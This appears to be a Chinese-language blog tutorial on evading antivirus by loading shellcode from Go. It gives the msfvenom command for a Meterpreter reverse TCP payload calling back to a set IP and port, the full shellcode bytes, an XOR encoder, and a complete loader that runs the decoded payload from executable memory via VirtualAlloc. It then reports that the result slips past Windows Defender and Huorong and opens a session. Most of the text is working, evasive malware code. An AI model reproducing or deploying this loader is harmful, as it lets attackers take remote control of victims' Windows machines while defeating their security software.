用Python加载shellcode能有一定的免杀效果想必已经老生常谈了,然后我就突发奇想,如果用go加载shellcode能不能达到python那样的效果呢

msfvenom生成一段shellcode

1
msfvenom -p windows/x64/meterpreter/reverse_tcp -f num LHOST=192.168.141.136 LPORT=1234

这里要注意一点:如果我们直接用go加载shellcode,会被部分av查杀,例如:火绒、windows Defender等等

先把我们的shellcode异或一下,然后再加载。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
package main

import "fmt"

const (
KEY_1 = 55
KEY_2 = 66
)

func main() {
shellcode := []byte{0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xcc, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9,
0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48,
0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x0f, 0x85, 0x72, 0x00, 0x00, 0x00, 0x8b,
0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b,
0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41,
0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1,
0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45,
0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b,
0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48,
0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9,
0x4b, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xbe, 0x77, 0x73, 0x32, 0x5f, 0x33, 0x32, 0x00, 0x00,
0x41, 0x56, 0x49, 0x89, 0xe6, 0x48, 0x81, 0xec, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xe5,
0x49, 0xbc, 0x02, 0x00, 0x04, 0xd2, 0xc0, 0xa8, 0x8d, 0x88, 0x41, 0x54, 0x49, 0x89, 0xe4,
0x4c, 0x89, 0xf1, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x4c, 0x89, 0xea, 0x68,
0x01, 0x01, 0x00, 0x00, 0x59, 0x41, 0xba, 0x29, 0x80, 0x6b, 0x00, 0xff, 0xd5, 0x6a, 0x0a,
0x41, 0x5e, 0x50, 0x50, 0x4d, 0x31, 0xc9, 0x4d, 0x31, 0xc0, 0x48, 0xff, 0xc0, 0x48, 0x89,
0xc2, 0x48, 0xff, 0xc0, 0x48, 0x89, 0xc1, 0x41, 0xba, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5,
0x48, 0x89, 0xc7, 0x6a, 0x10, 0x41, 0x58, 0x4c, 0x89, 0xe2, 0x48, 0x89, 0xf9, 0x41, 0xba,
0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0a, 0x49, 0xff, 0xce, 0x75, 0xe5,
0xe8, 0x93, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0xe2, 0x4d, 0x31, 0xc9,
0x6a, 0x04, 0x41, 0x58, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5,
0x83, 0xf8, 0x00, 0x7e, 0x55, 0x48, 0x83, 0xc4, 0x20, 0x5e, 0x89, 0xf6, 0x6a, 0x40, 0x41,
0x59, 0x68, 0x00, 0x10, 0x00, 0x00, 0x41, 0x58, 0x48, 0x89, 0xf2, 0x48, 0x31, 0xc9, 0x41,
0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x89, 0xc3, 0x49, 0x89, 0xc7, 0x4d, 0x31,
0xc9, 0x49, 0x89, 0xf0, 0x48, 0x89, 0xda, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8,
0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7d, 0x28, 0x58, 0x41, 0x57, 0x59, 0x68, 0x00, 0x40,
0x00, 0x00, 0x41, 0x58, 0x6a, 0x00, 0x5a, 0x41, 0xba, 0x0b, 0x2f, 0x0f, 0x30, 0xff, 0xd5,
0x57, 0x59, 0x41, 0xba, 0x75, 0x6e, 0x4d, 0x61, 0xff, 0xd5, 0x49, 0xff, 0xce, 0xe9, 0x3c,
0xff, 0xff, 0xff, 0x48, 0x01, 0xc3, 0x48, 0x29, 0xc6, 0x48, 0x85, 0xf6, 0x75, 0xb4, 0x41,
0xff, 0xe7, 0x58, 0x6a, 0x00, 0x59, 0x49, 0xc7, 0xc2, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5,}
fmt.Print("{")
for i := 0; i < len(shellcode); i++ {
fmt.Print(shellcode[i]^KEY_1^KEY_2, ",")
}
fmt.Print("}")
}

加载shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
package main

import (
"syscall"
"unsafe"
)

const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40 // 区域可以执行代码,应用程序可以读写该区域。
KEY_1 = 55
KEY_2 = 66
)

var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)

func main() {
xor_shellcode := []byte{0x89, 0x3d, 0xf6, 0x91, 0x85, 0x9d, 0xb9, 0x75, 0x75, 0x75, 0x34, 0x24, 0x34, 0x25, 0x27, 0x24, 0x23, 0x3d, 0x44, 0xa7, 0x10, 0x3d, 0xfe, 0x27, 0x15, 0x3d, 0xfe, 0x27, 0x6d, 0x3d, 0xfe, 0x27, 0x55, 0x3d, 0xfe, 0x7, 0x25, 0x3d, 0x7a, 0xc2, 0x3f, 0x3f, 0x38, 0x44, 0xbc, 0x3d, 0x44, 0xb5, 0xd9, 0x49, 0x14, 0x9, 0x77, 0x59, 0x55, 0x34, 0xb4, 0xbc, 0x78, 0x34, 0x74, 0xb4, 0x97, 0x98, 0x27, 0x34, 0x24, 0x3d, 0xfe, 0x27, 0x55, 0xfe, 0x37, 0x49, 0x3d, 0x74, 0xa5, 0x13, 0xf4, 0xd, 0x6d, 0x7e, 0x77, 0x7a, 0xf0, 0x7, 0x75, 0x75, 0x75, 0xfe, 0xf5, 0xfd, 0x75, 0x75, 0x75, 0x3d, 0xf0, 0xb5, 0x1, 0x12, 0x3d, 0x74, 0xa5, 0x25, 0xfe, 0x3d, 0x6d, 0x31, 0xfe, 0x35, 0x55, 0x3c, 0x74, 0xa5, 0x96, 0x23, 0x3d, 0x8a, 0xbc, 0x34, 0xfe, 0x41, 0xfd, 0x3d, 0x74, 0xa3, 0x38, 0x44, 0xbc, 0x3d, 0x44, 0xb5, 0xd9, 0x34, 0xb4, 0xbc, 0x78, 0x34, 0x74, 0xb4, 0x4d, 0x95, 0x0, 0x84, 0x39, 0x76, 0x39, 0x51, 0x7d, 0x30, 0x4c, 0xa4, 0x0, 0xad, 0x2d, 0x31, 0xfe, 0x35, 0x51, 0x3c, 0x74, 0xa5, 0x13, 0x34, 0xfe, 0x79, 0x3d, 0x31, 0xfe, 0x35, 0x69, 0x3c, 0x74, 0xa5, 0x34, 0xfe, 0x71, 0xfd, 0x3d, 0x74, 0xa5, 0x34, 0x2d, 0x34, 0x2d, 0x2b, 0x2c, 0x2f, 0x34, 0x2d, 0x34, 0x2c, 0x34, 0x2f, 0x3d, 0xf6, 0x99, 0x55, 0x34, 0x27, 0x8a, 0x95, 0x2d, 0x34, 0x2c, 0x2f, 0x3d, 0xfe, 0x67, 0x9c, 0x3e, 0x8a, 0x8a, 0x8a, 0x28, 0x3c, 0xcb, 0x2, 0x6, 0x47, 0x2a, 0x46, 0x47, 0x75, 0x75, 0x34, 0x23, 0x3c, 0xfc, 0x93, 0x3d, 0xf4, 0x99, 0xd5, 0x74, 0x75, 0x75, 0x3c, 0xfc, 0x90, 0x3c, 0xc9, 0x77, 0x75, 0x71, 0xa7, 0xb5, 0xdd, 0xf8, 0xfd, 0x34, 0x21, 0x3c, 0xfc, 0x91, 0x39, 0xfc, 0x84, 0x34, 0xcf, 0x39, 0x2, 0x53, 0x72, 0x8a, 0xa0, 0x39, 0xfc, 0x9f, 0x1d, 0x74, 0x74, 0x75, 0x75, 0x2c, 0x34, 0xcf, 0x5c, 0xf5, 0x1e, 0x75, 0x8a, 0xa0, 0x1f, 0x7f, 0x34, 0x2b, 0x25, 0x25, 0x38, 0x44, 0xbc, 0x38, 0x44, 0xb5, 0x3d, 0x8a, 0xb5, 0x3d, 0xfc, 0xb7, 0x3d, 0x8a, 0xb5, 0x3d, 0xfc, 0xb4, 0x34, 0xcf, 0x9f, 0x7a, 0xaa, 0x95, 0x8a, 0xa0, 0x3d, 0xfc, 0xb2, 0x1f, 0x65, 0x34, 0x2d, 0x39, 0xfc, 0x97, 0x3d, 0xfc, 0x8c, 0x34, 0xcf, 0xec, 0xd0, 0x1, 0x14, 0x8a, 0xa0, 0xf0, 0xb5, 0x1, 0x7f, 0x3c, 0x8a, 0xbb, 0x0, 0x90, 0x9d, 0xe6, 0x75, 0x75, 0x75, 0x3d, 0xf6, 0x99, 0x65, 0x3d, 0xfc, 0x97, 0x38, 0x44, 0xbc, 0x1f, 0x71, 0x34, 0x2d, 0x3d, 0xfc, 0x8c, 0x34, 0xcf, 0x77, 0xac, 0xbd, 0x2a, 0x8a, 0xa0, 0xf6, 0x8d, 0x75, 0xb, 0x20, 0x3d, 0xf6, 0xb1, 0x55, 0x2b, 0xfc, 0x83, 0x1f, 0x35, 0x34, 0x2c, 0x1d, 0x75, 0x65, 0x75, 0x75, 0x34, 0x2d, 0x3d, 0xfc, 0x87, 0x3d, 0x44, 0xbc, 0x34, 0xcf, 0x2d, 0xd1, 0x26, 0x90, 0x8a, 0xa0, 0x3d, 0xfc, 0xb6, 0x3c, 0xfc, 0xb2, 0x38, 0x44, 0xbc, 0x3c, 0xfc, 0x85, 0x3d, 0xfc, 0xaf, 0x3d, 0xfc, 0x8c, 0x34, 0xcf, 0x77, 0xac, 0xbd, 0x2a, 0x8a, 0xa0, 0xf6, 0x8d, 0x75, 0x8, 0x5d, 0x2d, 0x34, 0x22, 0x2c, 0x1d, 0x75, 0x35, 0x75, 0x75, 0x34, 0x2d, 0x1f, 0x75, 0x2f, 0x34, 0xcf, 0x7e, 0x5a, 0x7a, 0x45, 0x8a, 0xa0, 0x22, 0x2c, 0x34, 0xcf, 0x0, 0x1b, 0x38, 0x14, 0x8a, 0xa0, 0x3c, 0x8a, 0xbb, 0x9c, 0x49, 0x8a, 0x8a, 0x8a, 0x3d, 0x74, 0xb6, 0x3d, 0x5c, 0xb3, 0x3d, 0xf0, 0x83, 0x0, 0xc1, 0x34, 0x8a, 0x92, 0x2d, 0x1f, 0x75, 0x2c, 0x3c, 0xb2, 0xb7, 0x85, 0xc0, 0xd7, 0x23, 0x8a, 0xa0}
var shellcode []byte
for i := 0; i < len(xor_shellcode); i++ {
shellcode = append(shellcode, xor_shellcode[i]^KEY_1^KEY_2)
}
addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if err != nil && err.Error() != "The operation completed successfully." {
syscall.Exit(0)
}
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
if err != nil && err.Error() != "The operation completed successfully." {
syscall.Exit(0)
}
syscall.Syscall(addr, 0, 0, 0, 0)
}

然后go build就可以了,用upx压缩一下体积也不是很大

image.png
image.png

可以正常上线:

image.png
image.png

查杀一下

image.png
image.png

Windows Defender

image.png
image.png

virscan扫描结果

image.png
image.png

说明golang加载shellcode免杀效果还是不错的,而且体积也没有python的大,后期还是有很大的挖掘空间的